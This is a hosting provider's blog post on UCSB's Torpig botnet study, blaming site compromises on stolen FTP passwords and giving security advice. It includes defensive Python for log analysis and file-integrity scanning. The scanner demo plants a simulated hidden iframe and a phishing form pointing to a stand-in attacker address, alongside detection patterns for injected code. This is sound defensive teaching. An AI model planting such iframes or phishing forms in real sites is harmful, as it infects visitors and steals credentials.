
UCSB Studies Botnet and Concludes It's Partially Your Fault

While the title of this post is a joke, somewhat, I read a fascinating white paper published by the University of California, Santa Barbara that outlined something near and dear to my heart - security. The white paper is located here, and while I recommend that everyone read it, I also realize that most of you would start and then your eyes would glaze over in stark incomprehension, so let's hit the high points with regard to how what they found relates to you, and to us.

In short, UCSB managed to take over the Torpig botnet for 10 days, and were able to study precisely how it infects machines, what it does, what it collects, how it communicates, and, perhaps most relevant to you as Internet citizens, how you make it easier for the botnet to steal your sensitive information and use your sites to infect others.

Torpig starts on legitimate web sites - your web sites, our web sites, any web sites it can get to. The HTML is modified without your knowledge to include JavaScript that sends each visitor off to download exploits, which infect the visitor's machine if they can. Eventually the payload works its way into your applications. UCSB found that in addition to tampering with Windows system files, the botnet inserts itself into Internet Explorer, Firefox and Opera; FTP clients like LeechFTP and CuteFTP; email clients like Thunderbird, Outlook and Eudora; and instant messengers like Skype and ICQ, so that whatever you type into them can be collected. Yeah, it takes over. Silently.

The #1 exploit we see, the #1 thing that happens to people's web sites, is an FTP exploit. And I don't mean we get hacked. I mean computers from all over the Internet log in via FTP with legitimate credentials - credentials you picked, you store and you use - and begin changing your HTML code and uploading phishing pages to your site. Hopefully we find them - and then we suspend you.
And you call us up and scream at us because you assume that it's our server that got exploited - after all, there is the phishing page on your site! For about a year now, I have had a mechanical, monotonous speech that I can rattle off in an attempt to explain that no one brute forced into your web site. We automatically firewall people so fast that the chances of that happening are next to nil. The cracker would have to be incredibly insightful, or incredibly lucky, to brute force or crack a password, because you try 5 times and we nuke you. OK, unless we left the firewall off - but we don't leave the firewall off. The point is that a login with the correct password on the first try looks exactly like you, and no firewall rule against failed attempts will ever see it. I know, sitting there, that the person yelling at me likely has their hands resting on a keyboard connected to a compromised machine, or gave the passwords to someone on a compromised machine. I also know that the chances of them believing me are next to nothing. They don't see it, so they don't believe it, and it's not THEIR machine acting funny, it's their site. To be frank, folks, this study feels like vindication. I have the urge to bold "I told you so! Sheesh!" and do the nyah nyah nyah dance. The fact is, though, it's really not something I am jubilant about - we lose those clients, either because they leave in a huff or we ask them to leave because they cannot and will not abide by the security protocols we require and will not disinfect their machine (or they send us a printout showing rootkits were found by the virus program but were "disinfected" or "quarantined", so we should let them back on). We're a business. We don't like to lose clients, and we don't like to lose money, so this situation isn't really vindication - but it does give us documented proof that the security of your site in many respects rests as much with you and your behavior on the Internet as it does with us. UCSB studied you all, too. :) And they came up with some conclusions.
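To make that point concrete, here is a small added example (my own illustration, not the UCSB paper's code and not our actual firewall) that runs two checks over constructed FTP log lines in a simplified made-up format: the five-strikes rule that firewalls a brute forcer, and a second check that flags a successful login from an address the account has never used before. The addresses, the account name "alice" and the known-source list are all assumptions for the demo. The stolen-credential login never fails once, so the first rule never sees it; only the second one does.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not real server output). Simplified made-up format:
# "<ISO timestamp> <client ip> <account> <LOGIN_OK|LOGIN_FAIL>".
# 203.0.113.7 is a brute forcer; 198.51.100.20 is the owner's usual address;
# 192.0.2.55 logs in once, at 3:42 am, with the owner's valid password.
SAMPLE_LOG = """\
2009-05-04T10:00:01 203.0.113.7 alice LOGIN_FAIL
2009-05-04T10:00:02 203.0.113.7 alice LOGIN_FAIL
2009-05-04T10:00:03 203.0.113.7 alice LOGIN_FAIL
2009-05-04T10:00:04 203.0.113.7 alice LOGIN_FAIL
2009-05-04T10:00:05 203.0.113.7 alice LOGIN_FAIL
2009-05-04T10:00:06 203.0.113.7 alice LOGIN_FAIL
2009-05-04T11:15:00 198.51.100.20 alice LOGIN_OK
2009-05-04T11:15:30 198.51.100.20 alice LOGIN_OK
2009-05-05T03:42:10 192.0.2.55 alice LOGIN_OK
"""

# Assumed: the addresses each account normally logs in from.
KNOWN_SOURCES = {"alice": {"198.51.100.20"}}

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (LOGIN_OK|LOGIN_FAIL)$")
MAX_FAILURES = 5              # "you try 5 times and we nuke you"
WINDOW = timedelta(minutes=10)


def parse(log_text):
    """Turn log lines into (timestamp, ip, account, success) tuples; skip junk lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, ip, account, result = m.groups()
            events.append((datetime.fromisoformat(ts), ip, account, result == "LOGIN_OK"))
    return events


def brute_force_blocks(events, max_failures=MAX_FAILURES, window=WINDOW):
    """Addresses that reach max_failures failed logins inside a sliding time window."""
    blocked = set()
    recent = defaultdict(list)          # ip -> timestamps of recent failures
    for ts, ip, _account, ok in events:
        if ok:
            continue                    # successes never count against the limit
        recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
        if len(recent[ip]) >= max_failures:
            blocked.add(ip)
    return blocked


def new_source_logins(events, known_sources=KNOWN_SOURCES):
    """Successful logins from an address the account has not used before."""
    flagged = []
    for ts, ip, account, ok in events:
        if ok and ip not in known_sources.get(account, set()):
            flagged.append((ts.isoformat(), ip, account))
    return flagged


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("firewalled for brute force:", sorted(brute_force_blocks(ev)))
    print("valid logins from unknown addresses:", new_source_logins(ev))
```

The brute forcer at 203.0.113.7 is gone after its fifth failure. The login from 192.0.2.55 has a failure count of zero, so the only thing that can catch it server-side is a change in where the account logs in from, and even that is a hint rather than proof, which is exactly why the fix has to happen on your machine.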
Out of the infections they studied, 10% of you actually discussed and were concerned about security - and yet had no idea the machines you were discussing security on were infected. 28% of the victims re-used passwords. 40% of the passwords were so weak they fell in a little over an hour: they shoved 173,686 passwords into a cracker, and in 65 minutes got 56,000 of them back. Another 14,000 were recovered in the 10 minutes after that, and 30,000 more in the next 24 hours. That's 100,000 passwords in about 25 hours - roughly 66 passwords a minute, or less than a second per password on average. Less Than One Second Per Password on Average.

We employ a lot of security to try and stop attacks and exploitations. We use suPHP, the mod_security application firewall, a software firewall, obscenely long passwords and changed ports, forced password strength, and a number of other things to try and make the servers secure. Our rules and requirements on behavior here on our boxes are much stricter than those of many, many other hosts, and we don't apologize for that - we're not the host for everyone. You can't do whatever you want here. Our servers run well, and our sites and servers crash much less than many other hosts'. There's a reason for that. We are, though, only part of the equation, and our implementations can only do so much. Your Internet behavior, your personal security practices, are paramount in keeping your site safe. This is one of the single most common exploits we see, and as you can see from how it actually happens, there's not a darn thing we can do on the server to stop a login that uses your real password. It's up to you - your practices, your password choices, your security software. So, now that we've lectured you, what do we do to keep our computers safe?
  1. KeePass - KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file, so you only have to remember one single master password or select the key file to unlock the whole database. The database is encrypted with well-regarded algorithms (AES and Twofish). We do not store passwords in plain text, in software programs, in browsers. Nada. They are all encrypted, so if we're ever exploited, they're not "get-able", at least for now. (Keep in mind that an encrypted database protects the passwords at rest; on a machine that is already infected, whatever you type or paste can still be captured, which is why item 2 matters as much as item 1.) (There is 1Password for Macs - thanks to Adam for reminding me that it's not entirely the Windows people's fault - though it mostly is. :P)
  2. Kaspersky - We never, ever, ever run without Kaspersky Internet Security. Ever. It's my personal favorite, and if I could get it for my house itself, I would. One of the biggest problems we see is that people have a virus and malware scanner running weekly or so, but they run rampant all over the Internet with no constant firewall protection that catches things as they come in. If you run a scanner and it shows a rootkit, I don't care WHAT your program says about how it quarantined this file and that file - you are very likely screwed already, to put it bluntly. If you have a rootkit, you nuke and rebuild (and wiping the drive with DBAN first, for good measure, is a good idea). Anything less is false security. The infection will very likely reinsert itself at the first possible chance it has. You don't have to use what we use, but you need to use something all the time, every day, whenever you are connected to the Internet. Always. Without exception. And keep it updated.
  3. Use Strong & Different Passwords for EVERYTHING - If I had a dime for everyone who asked me to change their password to something like pencil1 in cPanel (the same as their password in billing), I could retire. My rule is that if you can easily remember it, it's bad. Use a site like password meter to learn what a good password is, or to generate one - KeePass is awesome for this as well, as it generates them for you and remembers them in an encrypted format. But whatever you do, don't use pencil1 on everything. Oy vey. Please, don't.
  4. Don't store passwords unencrypted - The programs that let you save passwords are convenient, aren't they? Yep, they are - and for more than just you. If you wouldn't post it on a web site, don't store it in plain text.
  5. Know Your Site - Actually look at the file change dates on your site once in a while - did you last update that file in September 2008? Well, then why does it have an April 29, 2009 last updated date? Look at the code. (Dates are a quick first check, not proof: an attacker who can write the file can also reset its timestamp, so a saved list of file checksums is the more reliable comparison.) If you find you were infected, CHANGE your passwords - from a machine you know is clean. Contact us and let us know that you need us to monitor your site for file changes, and we will, just to be sure.
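Here is an added example of the "know your site" check (my own code, not our monitoring tooling and not from the UCSB paper): it takes a SHA-256 baseline of every file under a web root, diffs a later snapshot against it, and then looks through any added or changed HTML for the kind of code Torpig plants - hidden iframes, obfuscated eval(), or a script tag pulling from a host that is not yours. The "site", the allowed host www.example.com, the tampered files and the attacker address are all constructed for the demo.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Assumption: the host(s) your own pages legitimately load scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example.com"}

# Patterns for the injected code described in the post (hidden iframe, obfuscated JS).
INJECT_PATTERNS = {
    "hidden iframe": re.compile(
        r"<iframe\b[^>]*(?:width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b"
        r"|display\s*:\s*none|visibility\s*:\s*hidden)", re.I),
    "obfuscated eval": re.compile(
        r"\beval\s*\(\s*(?:unescape|String\.fromCharCode)\s*\(", re.I),
}
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?https?://([^/\"'\s>]+)", re.I)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Relative path -> SHA-256 of every regular file under root. Save this when the site is clean."""
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifest(baseline: dict, current: dict):
    """Files that appeared, disappeared, or changed content since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return added, removed, changed


def scan_for_injection(text: str, allowed_hosts=ALLOWED_SCRIPT_HOSTS) -> list:
    """Names of suspicious constructs found in one HTML document."""
    findings = [name for name, rx in INJECT_PATTERNS.items() if rx.search(text)]
    for m in SCRIPT_SRC.finditer(text):
        host = m.group(1).lower()
        if host not in allowed_hosts:
            findings.append("external script from " + host)
    return findings


def demo() -> dict:
    """Constructed scenario: baseline a tiny site, then simulate the FTP tampering."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.html").write_text(
            '<html><body><h1>Hi</h1>'
            '<script src="http://www.example.com/site.js"></script></body></html>')
        (root / "about.html").write_text("<html><body>About us</body></html>")
        baseline = build_manifest(root)

        # What the stolen FTP login does: append a hidden iframe, upload a phishing page.
        with (root / "index.html").open("a") as f:
            f.write('\n<iframe src="http://192.0.2.9/x.php" width=0 height=0></iframe>')
        (root / "phish.html").write_text("<form action=\"http://192.0.2.9/c.php\">...</form>")

        added, removed, changed = diff_manifest(baseline, build_manifest(root))
        findings = {p: scan_for_injection((root / p).read_text())
                    for p in added + changed if p.endswith(".html")}
        return {"added": added, "removed": removed, "changed": changed, "findings": findings}


if __name__ == "__main__":
    print(demo())
```

Run build_manifest once when you know the site is clean, keep the manifest somewhere the FTP account cannot write (the attacker has that password, so a manifest inside the web root can be edited along with the pages), and diff on a schedule. Timestamps can be reset by whoever writes the file; a content hash cannot be.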
These are small things you can do that make it much, much harder for you, your computer, and your site to be exploited. We've said it before, and we'll say it again - these botnets don't want you to know what they are doing. They want to use your computer for as long as they can to get as much information as they can to infect other people. They want your site to run as long as it can, infecting as many as they can. Don't make it easy for them.

